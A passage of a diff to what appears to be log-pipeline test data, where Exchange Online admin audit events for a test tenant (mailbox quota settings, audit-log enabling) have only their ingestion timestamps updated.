bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -4241,7 +4241,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853245Z", + "ingested": "2021-12-14T14:49:28.056974016Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:51\",\"ExternalAccess\":true,\"Id\":\"93d5f028-263c-45f1-dcf9-08d7ac0f2378\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -4322,7 +4322,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853250700Z", + "ingested": "2021-12-14T14:49:28.056974688Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"1eea5379-4c86-4d6f-00cf-08d7adfc0e23\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -4403,7 +4403,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853256600Z", + "ingested": "2021-12-14T14:49:28.056975161Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2202ec45-7abc-49dd-e35e-08d7adfc0e15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -4473,7 +4473,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853262400Z", + "ingested": "2021-12-14T14:49:28.056975666Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:23\",\"ExternalAccess\":true,\"Id\":\"80d8b808-c24c-4359-24cf-08d7adfc11e3\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\",\"Operation\":\"Set-RecipientEnforcementProvisioningPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\"},{\"Name\":\"PublicFolderHierarchyMailboxCountQuota\",\"Value\":\"100\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -4543,7 +4543,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853268100Z", + "ingested": "2021-12-14T14:49:28.056976105Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:24\",\"ExternalAccess\":true,\"Id\":\"9edbf9fe-f844-401f-e9ec-08d7adfc1242\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -4624,7 +4624,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853274600Z", + "ingested": "2021-12-14T14:49:28.056976612Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"7b5e608f-0a09-4251-8922-08d7adfc0d15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -4705,7 +4705,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853278600Z", + "ingested": "2021-12-14T14:49:28.056977053Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2cbbd2bb-607e-49b1-c02c-08d7adfc0e1c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -4775,7 +4775,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853283300Z", + "ingested": "2021-12-14T14:49:28.056977548Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:24\",\"ExternalAccess\":true,\"Id\":\"9edbf9fe-f844-401f-e9ec-08d7adfc1242\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -4843,7 +4843,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853288300Z", + "ingested": "2021-12-14T14:49:28.056978058Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:34\",\"ExternalAccess\":true,\"Id\":\"0d7995da-038f-40d9-2765-08d7ac0f3d4d\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\OwaMailboxPolicy-Default\",\"Operation\":\"Set-OwaMailboxPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"InstantMessagingType\",\"Value\":\"Ocs\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\OwaMailboxPolicy-Default\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -4926,7 +4926,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853293300Z", + "ingested": "2021-12-14T14:49:28.056978656Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:12\",\"ExternalAccess\":true,\"Id\":\"425128e3-4281-42f6-4ec7-08d7adfc0acd\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"Management\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange Migration\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"Migration\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -5007,7 +5007,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853299500Z", + "ingested": "2021-12-14T14:49:28.056979116Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"6ddabbf8-4b7c-4982-2683-08d7adfc0c10\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -5088,7 +5088,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853303200Z", + "ingested": "2021-12-14T14:49:28.056979701Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:13\",\"ExternalAccess\":true,\"Id\":\"e6a88958-ff2a-4e9b-d681-08d7adfc0b73\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -5169,7 +5169,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853307100Z", + "ingested": "2021-12-14T14:49:28.056980172Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:02\",\"ExternalAccess\":true,\"Id\":\"f580aae6-d0d5-4204-1a13-08d7ac0f2a03\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB 